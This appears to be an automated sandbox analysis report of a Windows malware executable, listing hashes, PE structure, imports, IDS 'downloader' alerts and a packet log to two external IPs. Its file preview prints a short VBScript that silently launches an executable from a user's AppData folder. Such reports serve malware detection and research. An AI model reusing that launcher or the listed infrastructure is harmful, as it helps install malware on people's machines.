                                                                      Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.k.o.n.k.e.d.\.l.e.c.h.e.r.i.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.7164788849497
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:8kDIr4ZdNj.exe
                                                                      File size:2'382'336 bytes
                                                                      MD5:a031da4bae8bd9cf87c071c94f67d21b
                                                                      SHA1:29146f6e8d3107eb8cc5b362b15d8e57c3f815fb
                                                                      SHA256:d746bf8ebc1bc19872aafe6329fd3865332165c7ef477901e5cdf76e88e9931f
                                                                      SHA512:bd84ac0d0d3a846b5eba97d7a440f79034bda7b381f836966561175e98aed3d87e194441da0a19836c6acb3ec8293970efecb46767f303fd12956a0db9fb0b42
                                                                      SSDEEP:49152:fu0c++OCvkGs9FacSc9fbFtWR1+0o8fyNq6UQruXZO1KgRudguKB+kyo3zJ57O1Y:GB3vkJ9Qc9jFs/QzNDogRudgLB/ySzry
                                                                      TLSH:0BB5F122A3DEC361CB769173BF6AB7016E7F78614630B95B2F840D7DA910171222D7A3
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                      Icon Hash:aaf3e3e3938382a0
                                                                      Entrypoint:0x427dcd
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x67579319 [Tue Dec 10 01:02:17 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:1
                                                                      File Version Major:5
                                                                      File Version Minor:1
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:1
                                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                      Instruction
                                                                      call 00007F2048F599EAh
                                                                      jmp 00007F2048F4C7B4h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push edi
                                                                      push esi
                                                                      mov esi, dword ptr [esp+10h]
                                                                      mov ecx, dword ptr [esp+14h]
                                                                      mov edi, dword ptr [esp+0Ch]
                                                                      mov eax, ecx
                                                                      mov edx, ecx
                                                                      add eax, esi
                                                                      cmp edi, esi
                                                                      jbe 00007F2048F4C93Ah
                                                                      cmp edi, eax
                                                                      jc 00007F2048F4CC9Eh
                                                                      bt dword ptr [004C31FCh], 01h
                                                                      jnc 00007F2048F4C939h
                                                                      rep movsb
                                                                      jmp 00007F2048F4CC4Ch
                                                                      cmp ecx, 00000080h
                                                                      jc 00007F2048F4CB04h
                                                                      mov eax, edi
                                                                      xor eax, esi
                                                                      test eax, 0000000Fh
                                                                      jne 00007F2048F4C940h
                                                                      bt dword ptr [004BE324h], 01h
                                                                      jc 00007F2048F4CE10h
                                                                      bt dword ptr [004C31FCh], 00000000h
                                                                      jnc 00007F2048F4CADDh
                                                                      test edi, 00000003h
                                                                      jne 00007F2048F4CAEEh
                                                                      test esi, 00000003h
                                                                      jne 00007F2048F4CACDh
                                                                      bt edi, 02h
                                                                      jnc 00007F2048F4C93Fh
                                                                      mov eax, dword ptr [esi]
                                                                      sub ecx, 04h
                                                                      lea esi, dword ptr [esi+04h]
                                                                      mov dword ptr [edi], eax
                                                                      lea edi, dword ptr [edi+04h]
                                                                      bt edi, 03h
                                                                      jnc 00007F2048F4C943h
                                                                      movq xmm1, qword ptr [esi]
                                                                      sub ecx, 08h
                                                                      lea esi, dword ptr [esi+08h]
                                                                      movq qword ptr [edi], xmm1
                                                                      lea edi, dword ptr [edi+08h]
                                                                      test esi, 00000007h
                                                                      je 00007F2048F4C995h
                                                                      bt esi, 03h
                                                                      jnc 00007F2048F4C9E8h
                                                                      Programming Language:
                                                                      • [ASM] VS2013 build 21005
                                                                      • [ C ] VS2013 build 21005
                                                                      • [C++] VS2013 build 21005
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [ASM] VS2013 UPD4 build 31101
                                                                      • [RES] VS2013 build 21005
                                                                      • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x17d114 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x245000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x17d114 | 0x17d200 | c22d5d9f8b9a9a6a3df977f13da4e14f | False | 0.9829939119383404 | data | 7.989325897711083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x245000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x1743dc | data | - | - | 1.0003108978271484
RT_GROUP_ICON | 0x243b94 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x243c0c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x243c20 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x243c34 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x243c48 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x243d24 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T16:46:54.328980+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49710 | 193.122.6.168 | 80 | TCP
2025-01-10T16:46:55.436814+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49710 | 193.122.6.168 | 80 | TCP
2025-01-10T16:46:56.002743+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49713 | 104.21.16.1 | 443 | TCP
2025-01-10T16:46:56.780575+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49714 | 193.122.6.168 | 80 | TCP
2025-01-10T16:46:58.077474+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49726 | 193.122.6.168 | 80 | TCP
2025-01-10T16:46:58.651903+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49729 | 104.21.16.1 | 443 | TCP
2025-01-10T16:46:59.385176+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49734 | 193.122.6.168 | 80 | TCP
2025-01-10T16:46:59.948839+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49740 | 104.21.16.1 | 443 | TCP
2025-01-10T16:47:00.702469+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49746 | 193.122.6.168 | 80 | TCP
2025-01-10T16:47:01.999344+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49754 | 193.122.6.168 | 80 | TCP
2025-01-10T16:47:02.697410+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49759 | 104.21.16.1 | 443 | TCP
2025-01-10T16:47:03.405608+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49765 | 193.122.6.168 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 16:46:53.441190958 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:53.446108103 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:53.446178913 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:53.446540117 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:53.452658892 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:54.084300995 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:54.092763901 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:54.097635984 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:54.278549910 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:54.328979969 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:54.385951042 CET | 49711 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:54.386007071 CET | 443 | 49711 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:54.386076927 CET | 49711 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:54.433713913 CET | 49711 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:54.433739901 CET | 443 | 49711 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:54.923721075 CET | 443 | 49711 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:54.923836946 CET | 49711 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:54.936706066 CET | 49711 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:54.936733007 CET | 443 | 49711 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:54.937068939 CET | 443 | 49711 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:54.983701944 CET | 49711 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:55.041376114 CET | 49711 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:55.083358049 CET | 443 | 49711 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:55.163240910 CET | 443 | 49711 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:55.163331032 CET | 443 | 49711 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:55.163410902 CET | 49711 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:55.195090055 CET | 49711 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:55.198730946 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:55.203557968 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:55.384382010 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:55.386607885 CET | 49713 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:55.386640072 CET | 443 | 49713 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:55.386732101 CET | 49713 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:55.386986017 CET | 49713 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:55.387003899 CET | 443 | 49713 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:55.436814070 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:55.868957043 CET | 443 | 49713 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:55.889314890 CET | 49713 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:55.889348030 CET | 443 | 49713 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:56.002756119 CET | 443 | 49713 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:56.002825975 CET | 443 | 49713 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:56.002939939 CET | 49713 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:56.045156002 CET | 49713 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:56.087971926 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:56.088980913 CET | 49714 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:56.093513012 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:56.094003916 CET | 80 | 49714 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:56.094096899 CET | 49714 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:56.094131947 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:56.097676039 CET | 49714 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:56.102530003 CET | 80 | 49714 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:56.729125023 CET | 80 | 49714 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:56.730670929 CET | 49720 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:56.730711937 CET | 443 | 49720 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:56.731055975 CET | 49720 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:56.731055975 CET | 49720 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:56.731091022 CET | 443 | 49720 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:56.780575037 CET | 49714 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:57.208010912 CET | 443 | 49720 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:57.209739923 CET | 49720 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:57.209764957 CET | 443 | 49720 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:57.362585068 CET | 443 | 49720 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:57.362659931 CET | 443 | 49720 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:57.362781048 CET | 49720 | 443 | 192.168.2.6 | 104.21.16.1
